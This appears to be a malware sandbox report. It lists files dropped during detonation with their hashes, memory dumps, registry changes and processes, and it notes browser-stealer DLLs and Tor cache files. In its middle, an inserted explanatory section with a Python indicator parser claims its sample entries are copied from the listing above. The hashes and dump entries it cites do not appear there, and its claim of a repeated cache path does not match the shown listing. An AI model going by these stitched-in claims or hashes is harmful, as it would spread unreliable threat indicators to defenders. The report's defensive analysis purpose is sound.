MD5 29791c396cce40fb81a6ff5c8532e66e
SHA1 bc08208c775f349359a528a50a65bf52e8c03584
SHA256 dbb93994e45c9c060330e0a5ad950424f68ada7646f8a8b19372f08a2fc735aa
SHA512 185c1d17d41d4ecf4ffd899ba2dd4f1e3d3f1654227dd3ad0cc1ae11a816ff5a6c4bff9cbe89f251603e831eb23994f5877dbe3c6eed11e2575fbe7b7f8ff263

memory/1940-891-0x0000000000400000-0x0000000002D3C000-memory.dmp

memory/1940-904-0x0000000002E45000-0x0000000002E5B000-memory.dmp

memory/1940-905-0x0000000000220000-0x000000000022B000-memory.dmp

memory/1580-903-0x0000000000CB0000-0x0000000001A33000-memory.dmp

memory/1088-902-0x0000000000E90000-0x0000000001447000-memory.dmp

memory/3020-906-0x00000000003F0000-0x00000000003F1000-memory.dmp

memory/2140-907-0x0000000000230000-0x0000000000330000-memory.dmp

memory/2140-908-0x0000000004460000-0x0000000004494000-memory.dmp

memory/1400-909-0x0000000004B50000-0x0000000004F48000-memory.dmp

memory/1400-910-0x0000000004F50000-0x000000000583B000-memory.dmp

memory/2140-911-0x0000000000400000-0x0000000002D3F000-memory.dmp

memory/1344-912-0x0000000002DD0000-0x0000000002ED0000-memory.dmp

memory/1344-914-0x0000000000220000-0x000000000022B000-memory.dmp

memory/1188-913-0x0000000002170000-0x0000000002186000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-S9O7B.tmp\lxe8ZxGuXmyHRbaShB6RUbK4.tmp

MD5 40c92a8e43929c9d8f38c1cd29a33d42
SHA1 d736c68db624fdca36bd8c2b18d4a5cfad25e088
SHA256 1bea54b564637c6ea5b30839e6a2d12c3808f5c3e09c664f3aa8a4035cb910f8
SHA512 01bf5246ce33b09ac2a47bc0cfb103156fbee5c8e7bf8752d6a99eff83f627ba5ead8be7820b4d126cdca4f180474c069861837e8ab0837ec8037aad0b08f263

\Users\Admin\AppData\Local\Temp\7zS760.tmp\Install.exe

MD5 d7ae760d1d05cb0c45962a594e3bb7f6
SHA1 5b766ed71a13204b86a3eab97eda7ce7e2803b72
SHA256 24f1244d3cba2b9b71297222f42886c038398054b9e6f4b039c5b68561e45bce
SHA512 f22ac5b5f96b94196c4230470ca55bf73b7f0860708f40aa7ba1964fe40f3088137f1d2b99131eefce392efc47b237726412e521258d73dae96a13d85318737c

memory/1344-915-0x0000000000400000-0x0000000002D3C000-memory.dmp

memory/1400-922-0x0000000000400000-0x000000000311F000-memory.dmp

memory/2200-923-0x0000000004AF0000-0x0000000004EE8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS760.tmp\Install.exe

MD5 5afd344b7f0fc04a246d88fdccf573e4
SHA1 8fec62440f82da845c38beaa34919b49e389521c
SHA256 43695708a34ec60e3b2550b46c0963aedbdd463aa31ab61b1c24fe91688113b5
SHA512 bea89dc17d2255cbbe9418a72eba7e1005dca8a62a337d9d192fbaf9e4ba9314f3b6e014e235b4e7ebda6ca27f6de10464a0e477531a65797717a0efef2e9ef4

memory/1860-927-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1088-928-0x00000000775E0000-0x00000000775E2000-memory.dmp

memory/2200-926-0x0000000000400000-0x000000000311F000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bed388797c4396cc5f52d8229f4ce59d
SHA1 21bd3955e4090db5c8ac529f35a6e8fc5e4ccd43
SHA256 08b4b82bc13b18b2a19b2cabd0a6f1f2f97d7300ff9c344f6fd5913fef640030
SHA512 19e9406fefd3687797f24901c3f06e68f3c8cefe9b8cd6c60870c5106c5fad2fc00c698070a0bf8e9f07f61b2b9a2d0fe40960d8cf964ccce64dd396534000e3

\Users\Admin\AppData\Local\Temp\7zS760.tmp\Install.exe

MD5 a678c88cf913286a6b84116ed49c60cf
SHA1 4af5b95e99fe0bcf0b77fe31458e70ff00b7fea9
SHA256 9cfc8f021887492567e644d70f8f9d00c109dff1fae06082c68d8eb3fccde4c0
SHA512 080b54b29004f795eec60188d6bd6b924452960ed964174facd6f5b95536e7fda7464c628f06ef6caaddd3a9c7902c666659668544d9aa8250b04fa268acc40e

\Users\Admin\AppData\Local\Temp\7zS760.tmp\Install.exe

MD5 86c9732fb18eacfa3cba464273809901
SHA1 33bfc16e35e9712924de7b7b3aa3328a3a034307
SHA256 e16120ec929640c1cced0010823abeff0a53f853f2727c64392b18faad2b53a0
SHA512 34d9b753e5f314ac54a09bb918a0c0d4036b5ddbd2b6b76ba8a1e8b8195c1a04bbbd82f902f966ef3bcae0b6f8b0c921d9d97c7d381c6cc8bf022fd0f7996ad1

C:\Users\Admin\AppData\Local\Temp\is-S9O7B.tmp\lxe8ZxGuXmyHRbaShB6RUbK4.tmp

MD5 d7afdadefbb15957264025514eb6caa5
SHA1 708dd3cf76401ff2283e6245e6f164e9be0779eb
SHA256 5bdffa741feed99a55e48ee4d6b15ebfc20e32700077d0bc69f09d27036e174a
SHA512 33a7d7e23a7d32d8359d156b2e080535cf5a3cac66e7a4d667456833f6ff271477217eeaa717992c2d59da6a2399d9b6dd563e12a768e585a24addc20486d92e

memory/3020-960-0x000007FEFD260000-0x000007FEFD2CC000-memory.dmp

memory/2040-967-0x00000000012F0000-0x000000000193A000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-LI77Q.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/3020-970-0x000007FEFD260000-0x000007FEFD2CC000-memory.dmp

memory/3020-961-0x0000000140000000-0x0000000140B9C000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-LI77Q.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/1400-969-0x0000000000400000-0x000000000311F000-memory.dmp

memory/1088-982-0x0000000000E90000-0x0000000001447000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-LI77Q.tmp\_isetup\_isdecmp.dll

MD5 a813d18268affd4763dde940246dc7e5
SHA1 c7366e1fd925c17cc6068001bd38eaef5b42852f
SHA256 e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64
SHA512 b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4

memory/3020-977-0x00000000773F0000-0x0000000077599000-memory.dmp

memory/2140-963-0x0000000000400000-0x0000000002D3F000-memory.dmp

memory/1580-962-0x0000000000080000-0x0000000000081000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS1EF6.tmp\Install.exe

MD5 6e88f7608da85c26304b7aeb1dd6900a
SHA1 003a006373ace5481e5311d44e381f3e7d134a25
SHA256 d5b137183906323d526128c265febc348e8f2cf8ab2865a554ba55b1d5ec01ef
SHA512 f294da79cdfa7b254c0720e2678bd9affa037bbfdeecb1bad8408a6b8aad3e7872d9aa62482917978c25969669ade2572228089b44a7833e7eebdc82341c266d

C:\Users\Admin\AppData\Local\Temp\7zS1EF6.tmp\Install.exe

MD5 1513b77d203cc3ea404af83815c7aadc
SHA1 79c91cd5476eb7e4ef734233e598040e1bd10ce2
SHA256 0cc66afcbf20b9a388955161f42f65d0e8aa87ae6a0aa9658b9b0263aca78b9e
SHA512 de30dc7f0bbd032d080bf57fc4ff57218604e918f1fb40297addfa6e2d8f0318c2cdc46b1339f2a3e9e41f6bb03441de4f556a58011fa92e59b0424b0cf39699

C:\Users\Admin\AppData\Local\Temp\7zS1EF6.tmp\Install.exe

MD5 c8161ba209bb346d39e7ebcf7610c9a4
SHA1 eeda25f9c030f88713b18fa04653974f20cd62ae
SHA256 75a8dd7cd39392eed19652703a6cefbc444f4c3723f2851d3543e2fdbfaddb6e
SHA512 9a863f19fbf5b615dff931c5427ed4f841fc7e5f9a65e3a36cc6db1b818eb736aa3271ebc51756b3b391c71cb7275965d5896d051d4c5711564edde6b1c9ffa7

\Users\Admin\AppData\Local\Temp\7zS1EF6.tmp\Install.exe

MD5 936cda9a3305cdbfb2030187e1e41c2f
SHA1 ee091c2ecffcb0d409bd69275f3d090f56c88f50
SHA256 33018966f2abe989f72556d1b72d4cfcc95d0aff876c2a9d9459f2369b10d930
SHA512 9a62255a6ec453aed464555e445fca543b235cab248b2431e685b062fe5e90d6806066341dce010ed717183c37bf94673c3c5f70f5c236981d2d47f4da546556

\Users\Admin\AppData\Local\Temp\7zS1EF6.tmp\Install.exe

MD5 17d66abab5787c21c0443ec897858581
SHA1 aa0625c094220e19b84fb3bd21bf6fa93845ae3e
SHA256 0098519bb4ec75230896646f3d5173f6cafb45021cdd087ae890ea5a21d5a503
SHA512 59557a61deda7d506f212931e9e8d189c55e1c5ce83addd3a9087d0547a73ec43a46a033fec59358b6525ca6059fd9f2975c99a7d18235c39372f70bc141f76d

\Users\Admin\AppData\Local\Temp\7zS1EF6.tmp\Install.exe

MD5 f1f92ed821e0567aa273019844a7757b
SHA1 dabe9bef0edc0b46884504e738538684554d9e2e
SHA256 d6724908a4bbb5f3c18e8359efde13474b639662db310af737cab277f3ccdbcd
SHA512 1b93866c42c07d4138e1d26f4d43d59d4b8864efb880faca7859128d41ab0394d9bf644204a8f6e341f4f942751f4b8fae3098f98cf53f0e7a4d3254ce884d9c

memory/1756-1006-0x0000000010000000-0x00000000105E6000-memory.dmp

memory/2200-985-0x0000000000400000-0x000000000311F000-memory.dmp

memory/1860-1008-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2928-1010-0x0000000000400000-0x00000000004BC000-memory.dmp

memory/2140-1011-0x0000000000400000-0x0000000002D3F000-memory.dmp

memory/1088-1013-0x0000000000E90000-0x0000000001447000-memory.dmp

memory/1088-1019-0x0000000000E90000-0x0000000001447000-memory.dmp

memory/2140-1023-0x0000000000400000-0x0000000002D3F000-memory.dmp

memory/1400-1024-0x0000000000400000-0x000000000311F000-memory.dmp

memory/1088-1025-0x0000000000E90000-0x0000000001447000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BFA7.exe

MD5 50eb0c4a6ba4fecfc98d6bce17ee8d67
SHA1 54868dc6f2e115dd7f9b21f3b2f2a4091afa8e58
SHA256 b46311def39da0442d0d01cbd4bfd157177ee3ddd27253cce108c6b661a582d0
SHA512 72d670f8a479b9a8d8f98417fd4dd70a5c7da0a92b4568f2d0a7ec0ba54025f870a2e2f511084be28f69188cc48a7990e712a6000902758494606c90be6b804f

memory/2776-1033-0x0000000004780000-0x0000000004938000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BFA7.exe

MD5 878d1999c35fde79c8c40f4b901a9118
SHA1 7a6aa769cf6b7bfcf1c9a9a12f86d1f01867d6eb
SHA256 dc802dec06a6841b40778cb6fc210e45ba0ccd9b8d2a41f488bc5cf26dd85c69
SHA512 6b11b4b8851e88b56d5b85ddbbf420b18179561e1507c5af4ae54bbd5de84552358d2fdf9daa019839dd344fb18ebe62e783cab28e28f5405cb74e5ffa57af1a

memory/2200-1026-0x0000000000400000-0x000000000311F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BFA7.exe

MD5 0459e3b6f56d34a2af063d1114a39386
SHA1 1eb1b9f59dab7a03b9c533dbb0768a5d8dd286e2
SHA256 c02472aa824eb2ee21c6e20608b46d09bd8a4247dc84d18b44c2ca36ea21e59f
SHA512 5f3020bac319b22d64d9ed836ed96e8b3c21cf3fbe3bb0ddca3d366b2fa2652e2982de0a5c7b896b56fed0677acba66ea4be4b4913b586fd4f2080d2857cbcd5

\Users\Admin\AppData\Local\Temp\BFA7.exe

MD5 b12a32d3450c2cd7aae7f9af384b4cac
SHA1 973641854c881465136f275283c9642f8bad62d5
SHA256 388ef1a3c7b241d0583503e836918a2a316d8e4a733fed3ab39c838d73cf91b4
SHA512 fc6510b724f6af1994c3ef8549dd178a2e986c816a88d4ee6f7ff0d2bb94e3f3b144e547994635a764b43f0127e8bb11dbcd00d26aad6d12a6378626bc2f77c3

memory/952-1039-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2140-1036-0x0000000000400000-0x0000000002D3F000-memory.dmp

memory/952-1042-0x0000000000400000-0x0000000000848000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BFA7.exe

MD5 ec107905993c0e3ea3796938a7703089
SHA1 4a8808f5bb1417798986fe5c6ceee88054fe3e7c
SHA256 88ea05c6230cc8c381064df526862873b066a8103c60b901c74a07354fe9e17d
SHA512 c9773f0045f684e98c6d44140c4865cb0508b4748913157e0a1ce4dfed491cd214ef73717fa7e458f8aeb8ce5b365ab9deac88ca4ad1517ef95b616b1f80b030

memory/952-1044-0x0000000000400000-0x0000000000848000-memory.dmp

memory/2776-1045-0x0000000004780000-0x0000000004938000-memory.dmp

memory/2776-1047-0x0000000004960000-0x0000000004B17000-memory.dmp

memory/952-1046-0x0000000000400000-0x0000000000848000-memory.dmp

memory/1400-1041-0x0000000000400000-0x000000000311F000-memory.dmp

memory/1088-1049-0x0000000000E90000-0x0000000001447000-memory.dmp

memory/952-1048-0x0000000000400000-0x0000000000848000-memory.dmp

memory/952-1051-0x0000000000400000-0x0000000000848000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdesc-consensus.tmp

MD5 87c43a55b4e2a918cfe1b55e76ae2614
SHA1 8bbbf94f531952e818341d10f3ef4f0adcbbe72d
SHA256 8fd9760d4d20d3e7cabd6353568aa15eff24829eb37f7748c66fdef3dbd13a06
SHA512 16d97946a5637d4c73104005f5dc2005088cc8f864aa87eabc9764f173281fee76880bfb7549716f16a5486971dddd8dac50ce4963bbb231a8f95b704bc0586a

memory/2040-1087-0x0000000073FA0000-0x000000007468E000-memory.dmp

C:\Users\Admin\Documents\GuardFox\I10Bs31inqsmkmzmxnpAQrv9.exe

MD5 e310dd02f60bd39f7754bbd048ed9ab1
SHA1 fe5000fcb8089fb6df1765e4f8ee058e306af55e
SHA256 a7156dd3ffde626580e97668ab180b4f323dc6d45a4eb82cd322bb1447a57cd7
SHA512 2ba93386f12e53c6540c94db73fbaf644f4b56dc04c40451a95f7cf107627a0ce0e3f526c3e4ebdecf30c7bb005f4d41636ae8451d8f9f899adca9703f747855

C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdescs.new

MD5 3e7c7c9bb95aed0eecb0c2c958afcbb1
SHA1 ed25976e78654a721f2df32118293fa8fccfac79
SHA256 559165126d6d699c5d3ec8242f2c96d79ec56e121264aa4d1424c0b36c47a046
SHA512 f42eaec7c49d7986d5cce56cde4d6c5bdc0fec079d6edc7755b7789d4df419edf62e48856ec6a084325238f3421ff14198a43ac876649b5bbce29c288fc9e298

C:\Users\Admin\Documents\GuardFox\v7aJoARLTh66sOaiUGezYuxG.exe

MD5 34414db88b6995ec1fbf40d93c720605
SHA1 ef16204fbc16b7ab2e644b8336babcfcc5a43478
SHA256 5a0fa1cdea8b4c3582226a7367eab18e8d4c303a07eb83f5c395f65bf441aae9
SHA512 c168f71cd0c4c493ef1819a6e5b40c8a6872aee34304ca108846fcf8da2a09e6b1bb070d79498750a149d8c4e0a0d02f99c9a99e471cc283614b6fab1c1c91b3

memory/1580-1132-0x0000000000CB0000-0x0000000001A33000-memory.dmp

\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\Users\Admin\AppData\Local\Temp\38DD.exe

MD5 931b31b03a14bd25615834377b2ed256
SHA1 899a7e209d3d7e919cf346a49b0bc0877f738383
SHA256 1bd7aedd5fcd9f921d0ee481f98a276603447b9721870b8aa13380d4f438c320
SHA512 ba6b9063fbe70228122f83bdeb70201e9859fd0362c8295b990bf2ae15e04561ee8513b7a0023a58de0ea50e3670a7b815f4afa457203de26a7214ec41ce0a35

memory/1088-1158-0x0000000000DA0000-0x0000000000DA1000-memory.dmp

memory/1088-1246-0x0000000000AC0000-0x0000000000AC1000-memory.dmp

memory/1088-1255-0x0000000000DF0000-0x0000000000DF1000-memory.dmp

memory/1088-1272-0x00000000029A0000-0x00000000029A1000-memory.dmp
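The listing above repeats one path with several hash sets (the CryptnetUrlCache metadata file, several of the GuardFox executables) and interleaves memory dumps named memory/<pid>-<n>-<start>-<end>-memory.dmp. The parser below is an added example, not part of the report or the sandbox vendor's tooling: it turns such a listing into indicators, validating hash lengths, collecting paths that were rewritten with different contents during the run, extracting the SHA256 values of dropped executables and DLLs, and grouping dumped regions by PID. The sample text is constructed from entries copied above (SHA1/SHA512 lines omitted for brevity; the parser accepts them); the drive-letter normalisation for entries such as \ProgramData\nss3.dll is an assumption, since the report omits the letter for some paths.

```python
"""Parse a sandbox "Files" listing (dropped files, each followed by MD5/SHA1/
SHA256/SHA512 lines, interleaved with memory/<pid>-<n>-<start>-<end>-memory.dmp
entries) into structured indicators. Added example, not sandbox-vendor tooling."""
import re
from collections import defaultdict, namedtuple
from dataclasses import dataclass, field

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
DUMP_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}


@dataclass
class Dropped:
    path: str
    hashes: dict = field(default_factory=dict)


Region = namedtuple("Region", "pid seq start end")


def normalize_path(path: str) -> str:
    # Assumption: drive-less entries such as \ProgramData\nss3.dll live on the
    # system drive; the report omits the letter for some dropped files.
    return "C:" + path if path.startswith("\\") else path


def parse_listing(text: str):
    """Return (files, regions). A non-blank line that is neither a hash line
    nor a dump entry starts a new dropped-file record."""
    files, regions, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := DUMP_RE.match(line):
            pid, seq, start, end = m.groups()
            regions.append(Region(int(pid), int(seq), int(start, 16), int(end, 16)))
            current = None
        elif m := HASH_RE.match(line):
            if current is None:
                raise ValueError(f"hash line without a preceding path: {line}")
            algo, digest = m.group(1), m.group(2).lower()
            if len(digest) != HASH_LEN[algo]:
                raise ValueError(f"bad {algo} length for {current.path}")
            current.hashes[algo] = digest
        else:
            current = Dropped(normalize_path(line))
            files.append(current)
    return files, regions


def rewritten_paths(files):
    """Paths seen with more than one distinct SHA256: the file was written
    repeatedly during detonation (a cache being refreshed, or a dropped
    executable overwritten by a later stage)."""
    seen = defaultdict(set)
    for f in files:
        if "SHA256" in f.hashes:
            seen[f.path].add(f.hashes["SHA256"])
    return {p: sorted(h) for p, h in seen.items() if len(h) > 1}


def sha256_iocs(files, suffixes=(".exe", ".dll")):
    """Unique SHA256 of dropped PE artifacts, the values worth blocklisting."""
    return sorted({f.hashes["SHA256"] for f in files
                   if "SHA256" in f.hashes and f.path.lower().endswith(suffixes)})


def regions_by_pid(regions):
    """Distinct (start, end) ranges per PID; a recurring range is the same
    mapping dumped again later in the run, not a new allocation."""
    out = defaultdict(set)
    for r in regions:
        out[r.pid].add((r.start, r.end))
    return {pid: sorted(v) for pid, v in out.items()}


# Constructed sample: entries copied from the listing above, SHA1/SHA512 omitted.
SAMPLE = r"""
memory/3020-8-0x0000000140000000-0x0000000140B9C000-memory.dmp
C:\Users\Admin\Documents\GuardFox\lxe8ZxGuXmyHRbaShB6RUbK4.exe
MD5 c57ebe73a6b34d435d831b2c72452106
SHA256 e61c96de658761a01eb7f66508b488bb3a446d802b3160e961e40dcbe87e5b98
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5 3fd11c12da67032f4efb45aa4f2430a0
SHA256 c304c5484528a4b399db66fbacf0ea87f11ba1f039ab478c133e237616aebb9f
memory/3020-55-0x0000000140000000-0x0000000140B9C000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5 9a43908e87a5d68456d9101a793c57df
SHA256 ec792a75f78c07a590f184b98739433022d28c3c975d41476d5cd3fde3814898
memory/1400-833-0x0000000004B50000-0x0000000004F48000-memory.dmp
C:\Users\Admin\Documents\GuardFox\lxe8ZxGuXmyHRbaShB6RUbK4.exe
MD5 79688e51ccac7cd5fd393356492a0b0f
SHA256 b2ded22b4e420de616de840fb92c221bfca93cc2b1f991d497d9d940750dd1c4
\ProgramData\nss3.dll
MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
"""
```

Two readings follow from the grouped output. A path that comes back from rewritten_paths with several SHA256 values needs every one of those hashes on the blocklist, not just the last; the same GuardFox file name was written with different contents more than once in this run. For the dump entries, PID 3020's repeated 0x140000000-0x140B9C000 range is one mapping captured again and again (0x140000000 is the default image base for 64-bit MSVC-linked executables), so those repeats describe successive snapshots of that process's main image rather than fresh allocations.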

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:48

Platform

win10v2004-20240221-en

Max time kernel

146s

Max time network

154s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\file_release_4.rar

Signatures

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2200714112-3788720386-2559682836-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A

Enumerates physical storage devices

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-2200714112-3788720386-2559682836-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A
Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1400 wrote to memory of 1104 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe
PID 1400 wrote to memory of 1104 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\file_release_4.rar

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\file_release_4.rar"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 204.178.17.96.in-addr.arpa | udp
US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp
US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp
US | 8.8.8.8:53 | 186.178.17.96.in-addr.arpa | udp
US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 172.178.17.96.in-addr.arpa | udp
US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:48

Platform

win7-20240221-en

Max time kernel

121s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"

Signatures

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe

"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"

Network

N/A

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:49

Platform

win7-20240221-en

Max time kernel

123s

Max time network

134s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1120 wrote to memory of 2476 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1120 wrote to memory of 2476 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1120 wrote to memory of 2476 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1120 wrote to memory of 2476 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1120 wrote to memory of 2476 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1120 wrote to memory of 2476 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1120 wrote to memory of 2476 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-02-23 17:45

Reported

2024-02-23 17:48

Platform

win10v2004-20240221-en

Max time kernel

147s

Max time network

154s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

Signatures

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods\ = "3" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib\ = "{346F8AC1-CEB1-4E3E-944B-87D9840505C3}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
